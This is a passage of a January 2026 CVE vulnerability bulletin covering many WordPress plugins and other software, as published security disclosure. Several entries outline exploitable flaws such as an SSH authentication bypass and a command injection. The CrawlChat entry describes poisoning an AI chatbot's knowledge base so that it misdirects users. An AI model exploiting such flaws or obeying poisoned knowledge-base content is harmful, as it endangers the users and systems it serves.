| blazethemes--Blogzee | Unrestricted Upload of File with Dangerous Type vulnerability in blazethemes Blogzee blogzee allows Using Malicious Files. This issue affects Blogzee: from n/a through <= 1.0.5. | 2026-01-22 | not yet calculated | CVE-2025-68910 | https://patchstack.com/database/Wordpress/Theme/blogzee/vulnerability/wordpress-blogzee-theme-1-0-5-arbitrary-file-upload-vulnerability?_s_id=cve |
| blazethemes--News Event | Unrestricted Upload of File with Dangerous Type vulnerability in blazethemes News Event news-event. This issue affects News Event: from n/a through <= 1.0.1. | 2026-01-22 | not yet calculated | CVE-2025-62056 | https://patchstack.com/database/Wordpress/Theme/news-event/vulnerability/wordpress-news-event-theme-1-0-1-arbitrary-file-upload-vulnerability?_s_id=cve |
| Booking Activities Team--Booking Activities | Incorrect Privilege Assignment vulnerability in Booking Activities Team Booking Activities booking-activities allows Privilege Escalation. This issue affects Booking Activities: from n/a through <= 1.16.44. | 2026-01-22 | not yet calculated | CVE-2025-67953 | https://patchstack.com/database/Wordpress/Plugin/booking-activities/vulnerability/wordpress-booking-activities-plugin-1-16-44-privilege-escalation-vulnerability?_s_id=cve |
| bookingalgorithms--BA Book Everything | Missing Authorization vulnerability in bookingalgorithms BA Book Everything ba-book-everything allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects BA Book Everything: from n/a through <= 1.8.16. | 2026-01-22 | not yet calculated | CVE-2026-24371 | https://patchstack.com/database/Wordpress/Plugin/ba-book-everything/vulnerability/wordpress-ba-book-everything-plugin-1-8-16-broken-access-control-vulnerability?_s_id=cve |
| Boopathi Rajan--WP Test Email | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Boopathi Rajan WP Test Email wp-test-email allows Reflected XSS. This issue affects WP Test Email: from n/a through <= 1.1.7. | 2026-01-22 | not yet calculated | CVE-2025-69102 | https://patchstack.com/database/Wordpress/Plugin/wp-test-email/vulnerability/wordpress-wp-test-email-plugin-1-1-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Botble--TransP | HTML injection vulnerability in multiple Botble products such as TransP, Athena, Martfury, and Homzen, consisting of an HTML injection due to a lack of proper validation of user input by sending a request to '/search' using the 'q' parameter. | 2026-01-20 | not yet calculated | CVE-2026-1183 | https://www.incibe.es/en/incibe-cert/notices/aviso/html-injection-multiple-botble-products |
| boxnow--BOX NOW Delivery | Missing Authorization vulnerability in boxnow BOX NOW Delivery box-now-delivery allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects BOX NOW Delivery: from n/a through <= 3.0.2. | 2026-01-23 | not yet calculated | CVE-2026-24571 | https://patchstack.com/database/Wordpress/Plugin/box-now-delivery/vulnerability/wordpress-box-now-delivery-plugin-3-0-2-broken-access-control-vulnerability?_s_id=cve |
| bPlugins--B Accordion | Insertion of Sensitive Information Into Sent Data vulnerability in bPlugins B Accordion b-accordion allows Retrieve Embedded Sensitive Data. This issue affects B Accordion: from n/a through <= 2.0.0. | 2026-01-23 | not yet calculated | CVE-2026-24565 | https://patchstack.com/database/Wordpress/Plugin/b-accordion/vulnerability/wordpress-b-accordion-plugin-2-0-0-sensitive-data-exposure-vulnerability?_s_id=cve |
| bPlugins--B Slider | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bPlugins B Slider b-slider allows DOM-Based XSS. This issue affects B Slider: from n/a through <= 2.0.6. | 2026-01-22 | not yet calculated | CVE-2026-24383 | https://patchstack.com/database/Wordpress/Plugin/b-slider/vulnerability/wordpress-b-slider-plugin-2-0-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Brecht--WP Recipe Maker | Missing Authorization vulnerability in Brecht WP Recipe Maker wp-recipe-maker allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Recipe Maker: from n/a through <= 10.2.4. | 2026-01-22 | not yet calculated | CVE-2026-24357 | https://patchstack.com/database/Wordpress/Plugin/wp-recipe-maker/vulnerability/wordpress-wp-recipe-maker-plugin-10-2-4-broken-access-control-vulnerability?_s_id=cve |
| briarinc--Anything Order by Terms | Missing Authorization vulnerability in briarinc Anything Order by Terms anything-order-by-terms allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Anything Order by Terms: from n/a through <= 1.4.0. | 2026-01-23 | not yet calculated | CVE-2026-24567 | https://patchstack.com/database/Wordpress/Plugin/anything-order-by-terms/vulnerability/wordpress-anything-order-by-terms-plugin-1-4-0-broken-access-control-vulnerability?_s_id=cve |
| Broadstreet--Broadstreet Ads | Missing Authorization vulnerability in Broadstreet Broadstreet Ads broadstreet allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Broadstreet Ads: from n/a through <= 1.52.1. | 2026-01-22 | not yet calculated | CVE-2025-69311 | https://patchstack.com/database/Wordpress/Plugin/broadstreet/vulnerability/wordpress-broadstreet-ads-plugin-1-52-1-broken-access-control-vulnerability?_s_id=cve |
| bslthemes--Myour | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in bslthemes Myour myour allows PHP Local File Inclusion. This issue affects Myour: from n/a through <= 1.5.1. | 2026-01-22 | not yet calculated | CVE-2025-67615 | https://patchstack.com/database/Wordpress/Theme/myour/vulnerability/wordpress-myour-theme-1-5-1-local-file-inclusion-vulnerability?_s_id=cve |
| BZOTheme--Mella | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in BZOTheme Mella mella allows PHP Local File Inclusion. This issue affects Mella: from n/a through <= 1.2.29. | 2026-01-22 | not yet calculated | CVE-2025-67616 | https://patchstack.com/database/Wordpress/Theme/mella/vulnerability/wordpress-mella-theme-1-2-29-local-file-inclusion-vulnerability?_s_id=cve |
| cardpaysolutions--Payment Gateway Authorize.Net CIM for WooCommerce | Missing Authorization vulnerability in cardpaysolutions Payment Gateway Authorize.Net CIM for WooCommerce authnet-cim-for-woo allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Payment Gateway Authorize.Net CIM for WooCommerce: from n/a through <= 2.1.2. | 2026-01-22 | not yet calculated | CVE-2025-68013 | https://patchstack.com/database/Wordpress/Plugin/authnet-cim-for-woo/vulnerability/wordpress-payment-gateway-authorize-net-cim-for-woocommerce-plugin-2-1-2-arbitrary-content-deletion-vulnerability?_s_id=cve |
| Cargus eCommerce--Cargus | Insertion of Sensitive Information Into Sent Data vulnerability in Cargus eCommerce Cargus cargus allows Retrieve Embedded Sensitive Data. This issue affects Cargus: from n/a through <= 1.5.8. | 2026-01-23 | not yet calculated | CVE-2026-24589 | https://patchstack.com/database/Wordpress/Plugin/cargus/vulnerability/wordpress-cargus-plugin-1-5-8-sensitive-data-exposure-vulnerability?_s_id=cve |
| Casey Bisson--wpCAS | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Casey Bisson wpCAS wpcas allows Reflected XSS. This issue affects wpCAS: from n/a through <= 1.07. | 2026-01-22 | not yet calculated | CVE-2025-68858 | https://patchstack.com/database/Wordpress/Plugin/wpcas/vulnerability/wordpress-wpcas-plugin-1-0-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Chainlit--Chainlit | Chainlit versions prior to 2.9.4 contain an arbitrary file read vulnerability in the /project/element update flow. An authenticated client can send a custom Element with a user-controlled path value, causing the server to copy the referenced file into the attacker's session. The resulting element identifier (chainlitKey) can then be used to retrieve the file contents via /project/file/<chainlitKey>, allowing disclosure of any file readable by the Chainlit service. | 2026-01-19 | not yet calculated | CVE-2026-22218 | https://github.com/Chainlit/chainlit/releases/tag/2.9.4 https://www.zafran.io/resources/chainleak-critical-ai-framework-vulnerabilities-expose-data-enable-cloud-takeover https://www.vulncheck.com/advisories/chainlit-arbitrary-file-read-via-project-element |
| Chainlit--Chainlit | Chainlit versions prior to 2.9.4 contain a server-side request forgery (SSRF) vulnerability in the /project/element update flow when configured with the SQLAlchemy data layer backend. An authenticated client can provide a user-controlled url value in an Element, which is fetched by the SQLAlchemy element creation logic using an outbound HTTP GET request. This allows an attacker to make arbitrary HTTP requests from the Chainlit server to internal network services or cloud metadata endpoints and store the retrieved responses via the configured storage provider. | 2026-01-19 | not yet calculated | CVE-2026-22219 | https://github.com/Chainlit/chainlit/releases/tag/2.9.4 https://www.zafran.io/resources/chainleak-critical-ai-framework-vulnerabilities-expose-data-enable-cloud-takeover https://www.vulncheck.com/advisories/chainlit-sqlalchemy-data-layer-ssrf-via-project-element |
| Chandni Patel--WP MapIt | Missing Authorization vulnerability in Chandni Patel WP MapIt wp-mapit allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP MapIt: from n/a through <= 3.0.3. | 2026-01-22 | not yet calculated | CVE-2026-22466 | https://patchstack.com/database/Wordpress/Plugin/wp-mapit/vulnerability/wordpress-wp-mapit-plugin-3-0-3-broken-access-control-vulnerability?_s_id=cve |
| charmbracelet--soft-serve | Soft Serve is a self-hostable Git server for the command line. Versions 0.11.2 and below have a critical authentication bypass vulnerability that allows an attacker to impersonate any user (including admin) by "offering" the victim's public key during the SSH handshake before authenticating with their own valid key. This occurs because the user identity is stored in the session context during the "offer" phase and is not cleared if that specific authentication attempt fails. This issue has been fixed in version 0.11.3. | 2026-01-22 | not yet calculated | CVE-2026-24058 | https://github.com/charmbracelet/soft-serve/security/advisories/GHSA-pchf-49fh-w34r https://github.com/charmbracelet/soft-serve/commit/8539f9ad39918b67d612a35785a2b4326efc8741 https://github.com/charmbracelet/soft-serve/releases/tag/v0.11.3 |
| Chris Simmons--WP BackItUp | Missing Authorization vulnerability in Chris Simmons WP BackItUp wp-backitup allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP BackItUp: from n/a through <= 2.0.0. | 2026-01-22 | not yet calculated | CVE-2025-68039 | https://patchstack.com/database/Wordpress/Plugin/wp-backitup/vulnerability/wordpress-wp-backitup-plugin-2-0-0-broken-access-control-vulnerability?_s_id=cve |
| cjjparadoxmax--Synergy Project Manager | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in cjjparadoxmax Synergy Project Manager synergy-project-manager allows Stored XSS. This issue affects Synergy Project Manager: from n/a through <= 1.5. | 2026-01-22 | not yet calculated | CVE-2025-68898 | https://patchstack.com/database/Wordpress/Plugin/synergy-project-manager/vulnerability/wordpress-synergy-project-manager-plugin-1-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| cleverplugins--SEO Booster | Missing Authorization vulnerability in cleverplugins SEO Booster seo-booster allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects SEO Booster: from n/a through <= 6.1.8. | 2026-01-22 | not yet calculated | CVE-2025-68019 | https://patchstack.com/database/Wordpress/Plugin/seo-booster/vulnerability/wordpress-seo-booster-plugin-6-1-8-broken-access-control-vulnerability?_s_id=cve |
| CleverReach--CleverReach WP | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in CleverReach® CleverReach® WP cleverreach-wp allows SQL Injection. This issue affects CleverReach® WP: from n/a through <= 1.5.22. | 2026-01-22 | not yet calculated | CVE-2025-68034 | https://patchstack.com/database/Wordpress/Plugin/cleverreach-wp/vulnerability/wordpress-cleverreach-wp-plugin-1-5-22-sql-injection-vulnerability?_s_id=cve |
| CleverSoft--Anon | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CleverSoft Anon anon2x allows Reflected XSS. This issue affects Anon: from n/a through <= 2.2.10. | 2026-01-22 | not yet calculated | CVE-2025-67620 | https://patchstack.com/database/Wordpress/Theme/anon2x/vulnerability/wordpress-anon-theme-2-2-10-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Cloudflare--Wrangler | SummaryA command injection vulnerability (CWE-78) has been found to exist in the `wrangler pages deploy` command. The issue occurs because the `--commit-hash` parameter is passed directly to a shell command without proper validation or sanitization, allowing an attacker with control of `--commit-hash` to execute arbitrary commands on the system running Wrangler. Root causeThe commitHash variable, derived from user input via the --commit-hash CLI argument, is interpolated directly into a shell command using template literals (e.g., execSync(`git show -s --format=%B ${commitHash}`)). Shell metacharacters are interpreted by the shell, enabling command execution. ImpactThis vulnerability is generally hard to exploit, as it requires --commit-hash to be attacker controlled. The vulnerability primarily affects CI/CD environments where `wrangler pages deploy` is used in automated pipelines and the --commit-hash parameter is populated from external, potentially untrusted sources. An attacker could exploit this to: * Run any shell command. * Exfiltrate environment variables. * Compromise the CI runner to install backdoors or modify build artifacts. Credits Disclosed responsibly by kny4hacker. Mitigation * Wrangler v4 users are requested to upgrade to Wrangler v4.59.1 or higher. * Wrangler v3 users are requested to upgrade to Wrangler v3.114.17 or higher. * Users on Wrangler v2 (EOL) should upgrade to a supported major version. | 2026-01-20 | not yet calculated | CVE-2026-0933 | https://github.com/cloudflare/workers-sdk |
| Cloudinary--Cloudinary | Missing Authorization vulnerability in Cloudinary Cloudinary cloudinary-image-management-and-manipulation-in-the-cloud-cdn allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Cloudinary: from n/a through <= 3.3.0. | 2026-01-23 | not yet calculated | CVE-2026-24560 | https://patchstack.com/database/Wordpress/Plugin/cloudinary-image-management-and-manipulation-in-the-cloud-cdn/vulnerability/wordpress-cloudinary-plugin-3-3-0-broken-access-control-vulnerability?_s_id=cve |
| CloudPanel--CLP Varnish Cache | Missing Authorization vulnerability in CloudPanel CLP Varnish Cache clp-varnish-cache allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects CLP Varnish Cache: from n/a through <= 1.0.2. | 2026-01-23 | not yet calculated | CVE-2026-24525 | https://patchstack.com/database/Wordpress/Plugin/clp-varnish-cache/vulnerability/wordpress-clp-varnish-cache-plugin-1-0-2-broken-access-control-vulnerability?_s_id=cve |
| Codeless--Slider Templates | Missing Authorization vulnerability in Codeless Slider Templates slider-templates allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Slider Templates: from n/a through <= 1.0.3. | 2026-01-22 | not yet calculated | CVE-2025-68009 | https://patchstack.com/database/Wordpress/Plugin/slider-templates/vulnerability/wordpress-slider-templates-plugin-1-0-3-broken-access-control-vulnerability?_s_id=cve |
| codisto--Omnichannel for WooCommerce | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in codisto Omnichannel for WooCommerce codistoconnect allows Stored XSS. This issue affects Omnichannel for WooCommerce: from n/a through <= 1.3.65. | 2026-01-22 | not yet calculated | CVE-2025-68041 | https://patchstack.com/database/Wordpress/Plugin/codistoconnect/vulnerability/wordpress-omnichannel-for-woocommerce-plugin-1-3-65-cross-site-scripting-xss-vulnerability?_s_id=cve |
| COP--UX Flat | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in COP UX Flat ux-flat allows Stored XSS. This issue affects UX Flat: from n/a through <= 5.4.0. | 2026-01-23 | not yet calculated | CVE-2026-24576 | https://patchstack.com/database/Wordpress/Plugin/ux-flat/vulnerability/wordpress-ux-flat-plugin-5-4-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| copier-org--copier | Copier is a library and CLI app for rendering project templates. Prior to version 9.11.2, Copier suggests that it's safe to generate a project from a safe template, i.e. one that doesn't use unsafe features like custom Jinja extensions which would require passing the `--UNSAFE,--trust` flag. As it turns out, a safe template can currently include arbitrary files/directories outside the local template clone location by using symlinks along with `_preserve_symlinks: false` (which is Copier's default setting). Version 9.11.2 patches the issue. | 2026-01-21 | not yet calculated | CVE-2026-23968 | https://github.com/copier-org/copier/security/advisories/GHSA-xjhm-gp88-8pfx https://github.com/copier-org/copier/commit/b3a7b3772d17cf0e7a4481978188c9f536c8d8f6 |
| copier-org--copier | Copier is a library and CLI app for rendering project templates. Prior to version 9.11.2, Copier suggests that it's safe to generate a project from a safe template, i.e. one that doesn't use unsafe features like custom Jinja extensions which would require passing the `--UNSAFE,--trust` flag. As it turns out, a safe template can currently write to arbitrary directories outside the destination path by using directory a symlink along with `_preserve_symlinks: true` and a generated directory structure whose rendered path is inside the symlinked directory. This way, a malicious template author can create a template that overwrites arbitrary files (according to the user's write permissions), e.g., to cause havoc. Version 9.11.2 patches the issue. | 2026-01-21 | not yet calculated | CVE-2026-23986 | https://github.com/copier-org/copier/security/advisories/GHSA-4fqp-r85r-hxqh https://github.com/copier-org/copier/commit/b3a7b3772d17cf0e7a4481978188c9f536c8d8f6 https://github.com/copier-org/copier/releases/tag/v9.11.2 |
| coreshop--CoreShop | CoreShop is a Pimcore enhanced eCommerce solution. An error-based SQL Injection vulnerability was identified in versions prior to 4.1.9 in the `CustomerTransformerController` within the CoreShop admin panel. The affected endpoint improperly interpolates user-supplied input into a SQL query, leading to database error disclosure and potential data extraction. Version 4.1.9 fixes the issue. | 2026-01-22 | not yet calculated | CVE-2026-23959 | https://github.com/coreshop/CoreShop/security/advisories/GHSA-fqcv-8859-86x2 https://github.com/coreshop/CoreShop/commit/af80b8f5c7df5f02f44e9c5e0a4a564de274eec2 https://github.com/coreshop/CoreShop/releases/tag/4.1.9 |
| cozythemes--HomeLancer | Missing Authorization vulnerability in cozythemes HomeLancer homelancer allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects HomeLancer: from n/a through <= 1.0.1. | 2026-01-22 | not yet calculated | CVE-2025-49375 | https://patchstack.com/database/Wordpress/Theme/homelancer/vulnerability/wordpress-homelancer-theme-1-0-1-broken-access-control-vulnerability?_s_id=cve |
| Craig Hewitt--Seriously Simple Podcasting | Server-Side Request Forgery (SSRF) vulnerability in Craig Hewitt Seriously Simple Podcasting seriously-simple-podcasting allows Server Side Request Forgery. This issue affects Seriously Simple Podcasting: from n/a through <= 3.14.1. | 2026-01-22 | not yet calculated | CVE-2026-24360 | https://patchstack.com/database/Wordpress/Plugin/seriously-simple-podcasting/vulnerability/wordpress-seriously-simple-podcasting-plugin-3-14-1-server-side-request-forgery-ssrf-vulnerability?_s_id=cve |
| crawlchat--crawlchat | CrawlChat is an open-source, AI-powered platform that transforms technical documentation into intelligent chatbots. Prior to version 0.0.8, a non-existing permission check for the CrawlChat's Discord bot allows non-manage guild users to put malicious content onto the collection knowledge base. Usually, admin / mods of a Discord guild use the `jigsaw` emoji to save a specific message (chain) onto the collection's knowledge base of CrawlChat. Unfortunately an permission check (for e.g. MANAGE_SERVER; MANAGE_MESSAGES etc.) was not done, allowing normal users of the guild to information to the knowledge base. With targeting specific parts that are commonly asked, users can manipulate the content given out by the bot (on all integrations), to e.g. redirect users to a malicious site, or send information to a malicious user. Version 0.0.8 patches the issue. | 2026-01-19 | not yet calculated | CVE-2026-23875 | https://github.com/crawlchat/crawlchat/security/advisories/GHSA-f484-62p4-6w4p https://github.com/crawlchat/crawlchat/commit/f90ebb93c6a830f6cf609d683f6425af8434573a https://github.com/crawlchat/crawlchat/releases/tag/v0.0.8 |
| CridioStudio--ListingPro Reviews | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CridioStudio ListingPro Reviews listingpro-reviews allows Reflected XSS. This issue affects ListingPro Reviews: from n/a through <= 1.7. | 2026-01-22 | not yet calculated | CVE-2025-69051 | https://patchstack.com/database/Wordpress/Plugin/listingpro-reviews/vulnerability/wordpress-listingpro-reviews-theme-1-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| CRM Perks--Integration for Contact Form 7 HubSpot | Insertion of Sensitive Information Into Sent Data vulnerability in CRM Perks Integration for Contact Form 7 HubSpot cf7-hubspot allows Retrieve Embedded Sensitive Data. This issue affects Integration for Contact Form 7 HubSpot: from n/a through <= 1.4.3. | 2026-01-23 | not yet calculated | CVE-2026-24559 | https://patchstack.com/database/Wordpress/Plugin/cf7-hubspot/vulnerability/wordpress-integration-for-contact-form-7-hubspot-plugin-1-4-3-sensitive-data-exposure-vulnerability?_s_id=cve |
| Crocoblock--JetEngine | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crocoblock JetEngine jet-engine allows Reflected XSS. This issue affects JetEngine: from n/a through <= 3.7.7. | 2026-01-22 | not yet calculated | CVE-2025-67923 | https://patchstack.com/database/Wordpress/Plugin/jet-engine/vulnerability/wordpress-jetengine-plugin-3-7-7-cross-site-scripting-xss-vulnerability?_s_id=cve |
| cvat-ai--cvat | CVAT is an open source interactive video and image annotation tool for computer vision. In versions 2.2.0 through 2.54.0, an attacker is able to execute arbitrary JavaScript in a victim user's CVAT UI session, provided that they are able to create a maliciously crafted label in a CVAT task or project, then get the victim user to either edit that label, or view a shape that refers to that label; and/or get the victim user to upload a maliciously crafted SVG image when configuring a skeleton. This gives the attacker temporary access to all CVAT resources that the victim user can access. Version 2.55.0 fixes the issue. | 2026-01-21 | not yet calculated | CVE-2026-23516 | https://github.com/cvat-ai/cvat/security/advisories/GHSA-3m7p-wx65-c7mp https://github.com/cvat-ai/cvat/commit/40800707fe39e3ff76c8d036eb953eb12d764e70 |
| cvat-ai--cvat | CVAT is an open source interactive video and image annotation tool for computer vision. In versions 1.0.0 through 2.54.0, users that have the staff status may freely change their permissions, including giving themselves superuser status and joining the admin group, which gives them full access to the data in the CVAT instance. Version 2.55.0 fixes the issue. As a workaround, review the list of users with staff status and revoke it from any users that are not expected to have superuser privileges. | 2026-01-21 | not yet calculated | CVE-2026-23526 | https://github.com/cvat-ai/cvat/security/advisories/GHSA-7pvv-w55f-qmw7 https://github.com/cvat-ai/cvat/commit/88ac7aa4d5b52271a30f1aa387c0f5745f8f77d4 |
| D-Link--D-View 8 | D-Link D-View 8 versions 2.0.1.107 and below contain an improper access control vulnerability in backend API endpoints. Any authenticated user can supply an arbitrary user_id value to retrieve sensitive credential data belonging to other users, including super administrators. The exposed credential material can be reused directly as a valid authentication secret, allowing full impersonation of the targeted account. This results in complete account takeover and full administrative control over the D-View system. | 2026-01-21 | not yet calculated | CVE-2026-23754 | https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10471 https://www.vulncheck.com/advisories/dlink-dview-8-idor-allows-credential-disclosure-and-account-takeover |
| D-Link--D-View 8 | D-Link D-View 8 versions 2.0.1.107 and below contain an uncontrolled search path vulnerability in the installer. When executed with elevated privileges via UAC, the installer attempts to load version.dll from its execution directory, allowing DLL preloading. An attacker can supply a malicious version.dll alongside the legitimate installer so that, when a victim runs the installer and approves the UAC prompt, attacker-controlled code executes with administrator privileges. This can lead to full system compromise. | 2026-01-21 | not yet calculated | CVE-2026-23755 | https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10471 https://www.vulncheck.com/advisories/dlink-dview-8-installer-dll-preloading-via-uncontrolled-search-path |
| daap-daap | NULL pointer dereference in the daap_reply_groups function in src/httpd_daap.c in owntone-server through commit 5e6f19a (newer commit after version 28.2) allows remote attackers to cause a Denial of Service. | 2026-01-20 | not yet calculated | CVE-2025-57155 | https://github.com/owntone/owntone-server/commit/d857116e4143a500d6a1ea13f4baa057ba3b0028 https://github.com/archersec/security-advisories/blob/master/owntone-server/owntone-server-advisory-2025.md |
| dacp--dacp | NULL pointer dereference in the dacp_reply_playqueueedit_clear function in src/httpd_dacp.c in owntone-server through commit 6d604a1 (newer commit after version 28.12) allows remote attackers to cause a Denial of Service (crash). | 2026-01-20 | not yet calculated | CVE-2025-57156 | https://github.com/owntone/owntone-server/issues/1907 https://github.com/owntone/owntone-server/commit/5e4d40ee03ae22ab79534bb1410fa9db96c9fabd https://github.com/archersec/security-advisories/blob/master/owntone-server/owntone-server-advisory-2025.md |
| dacp--dacp | A NULL pointer dereference in the dacp_reply_playqueueedit_move function (src/httpd_dacp.c) of owntone-server commit b7e385f allows attackers to cause a Denial of Service (DoS) via sending a crafted DACP request to the server. | 2026-01-20 | not yet calculated | CVE-2025-63648 | https://github.com/owntone/owntone-server/issues/1933 https://github.com/owntone/owntone-server/commit/5f526c7a7e08c567a5c72421d74a79dafdd07621 https://github.com/archersec/security-advisories/blob/master/owntone-server/owntone-server-advisory-2025.md |
| Damian--WP Popups | Missing Authorization vulnerability in Damian WP Popups wp-popups-lite allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Popups: from n/a through <= 2.2.0.3. | 2026-01-23 | not yet calculated | CVE-2026-24616 | https://patchstack.com/database/Wordpress/Plugin/wp-popups-lite/vulnerability/wordpress-wp-popups-plugin-2-2-0-3-broken-access-control-vulnerability?_s_id=cve |
| Daniel Iser--Easy Modal | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Daniel Iser Easy Modal easy-modal allows Stored XSS. This issue affects Easy Modal: from n/a through <= 2.1.0. | 2026-01-23 | not yet calculated | CVE-2026-24617 | https://patchstack.com/database/Wordpress/Plugin/easy-modal/vulnerability/wordpress-easy-modal-plugin-2-1-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| dataease--dataease | Dataease is an open source data visualization analysis tool. Prior to version 2.10.19, DataEase uses the MD5 hash of the user's password as the JWT signing secret. This deterministic secret derivation allows an attacker to brute-force the admin's password by exploiting unmonitored API endpoints that verify JWT tokens. The vulnerability has been fixed in v2.10.19. No known workarounds are available. | 2026-01-22 | not yet calculated | CVE-2026-23958 | https://github.com/dataease/dataease/security/advisories/GHSA-5wvm-4m4q-rh7j |
| dataease--SQLBot | SQLBot is an intelligent data query system based on a large language model and RAG. Versions prior to 1.5.0 contain a missing authentication vulnerability in the /api/v1/datasource/uploadExcel endpoint, allowing a remote unauthenticated attacker to upload arbitrary Excel/CSV files and inject data directly into the PostgreSQL database. The endpoint is explicitly added to the authentication whitelist, causing the TokenMiddleware to bypass all token validation. Uploaded files are parsed by pandas and inserted into the database via to_sql() with if_exists='replace' mode. The vulnerability has been fixed in v1.5.0. No known workarounds are available. | 2026-01-21 | not yet calculated | CVE-2025-69285 | https://github.com/dataease/SQLBot/security/advisories/GHSA-crfm-cch4-hjpv https://github.com/dataease/SQLBot/releases/tag/v1.5.0 |
| Deetronix--Booking Ultra Pro | Insertion of Sensitive Information Into Sent Data vulnerability in Deetronix Booking Ultra Pro booking-ultra-pro allows Retrieve Embedded Sensitive Data. This issue affects Booking Ultra Pro: from n/a through <= 1.1.23. | 2026-01-22 | not yet calculated | CVE-2025-68006 | https://patchstack.com/database/Wordpress/Plugin/booking-ultra-pro/vulnerability/wordpress-booking-ultra-pro-plugin-1-1-23-sensitive-data-exposure-vulnerability?_s_id=cve |
| Design--Stylish Cost Calculator | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Design Stylish Cost Calculator stylish-cost-calculator allows Stored XSS. This issue affects Stylish Cost Calculator: from n/a through <= 8.1.8. | 2026-01-23 | not yet calculated | CVE-2026-24630 | https://patchstack.com/database/Wordpress/Plugin/stylish-cost-calculator/vulnerability/wordpress-stylish-cost-calculator-plugin-8-1-8-cross-site-scripting-xss-vulnerability?_s_id=cve |
| designingmedia--Hostiko | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in designingmedia Hostiko hostiko allows Reflected XSS. This issue affects Hostiko: from n/a through < 94.3.6. | 2026-01-22 | not yet calculated | CVE-2025-67949 | https://patchstack.com/database/Wordpress/Theme/hostiko/vulnerability/wordpress-hostiko-theme-94-3-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| designthemes--Kids Heaven | Deserialization of Untrusted Data vulnerability in designthemes Kids Heaven kids-world allows Object Injection. This issue affects Kids Heaven: from n/a through <= 3.2. | 2026-01-22 | not yet calculated | CVE-2025-67619 | https://patchstack.com/database/Wordpress/Theme/kids-world/vulnerability/wordpress-kids-heaven-theme-3-2-php-object-injection-vulnerability?_s_id=cve |
| designthemes--OneLife | Deserialization of Untrusted Data vulnerability in designthemes OneLife onelife allows Object Injection. This issue affects OneLife: from n/a through <= 3.9. | 2026-01-22 | not yet calculated | CVE-2025-69002 | https://patchstack.com/database/Wordpress/Theme/onelife/vulnerability/wordpress-onelife-theme-3-9-php-object-injection-vulnerability?_s_id=cve |
| designthemes--Reservation Plugin | Missing Authorization vulnerability in designthemes Reservation Plugin dt-reservation-plugin allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Reservation Plugin: from n/a through <= 1.7. | 2026-01-22 | not yet calculated | CVE-2025-69095 | https://patchstack.com/database/Wordpress/Plugin/dt-reservation-plugin/vulnerability/wordpress-reservation-plugin-plugin-1-7-settings-change-vulnerability?_s_id=cve |
| designthemes--Vivagh | Deserialization of Untrusted Data vulnerability in designthemes Vivagh vivagh allows Object Injection. This issue affects Vivagh: from n/a through <= 2.4. | 2026-01-22 | not yet calculated | CVE-2025-68899 | https://patchstack.com/database/Wordpress/Theme/vivagh/vulnerability/wordpress-vivagh-theme-2-4-php-object-injection-vulnerability?_s_id=cve |
| Devolutions--Server | SQL Injection vulnerability in remote-sessions in Devolutions Server. This issue affects Devolutions Server 2025.3.1 through 2025.3.12 | 2026-01-19 | not yet calculated | CVE-2026-0610 | https://devolutions.net/security/advisories/DEVO-2026-0003/ |
| Devolutions--Server | Incorrect Authorization vulnerability in virtual gateway component in Devolutions Server allows attackers to bypass deny IP rules. This issue affects Server: from 2025.3.1 through 2025.3.12. | 2026-01-19 | not yet calculated | CVE-2026-1007 | https://devolutions.net/security/advisories/DEVO-2026-0003/ |
| DevsBlink--EduBlink Core | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in DevsBlink EduBlink Core edublink-core allows PHP Local File Inclusion. This issue affects EduBlink Core: from n/a through <= 2.0.7. | 2026-01-23 | not yet calculated | CVE-2026-24635 | https://patchstack.com/database/Wordpress/Plugin/edublink-core/vulnerability/wordpress-edublink-core-plugin-2-0-7-local-file-inclusion-vulnerability?_s_id=cve |
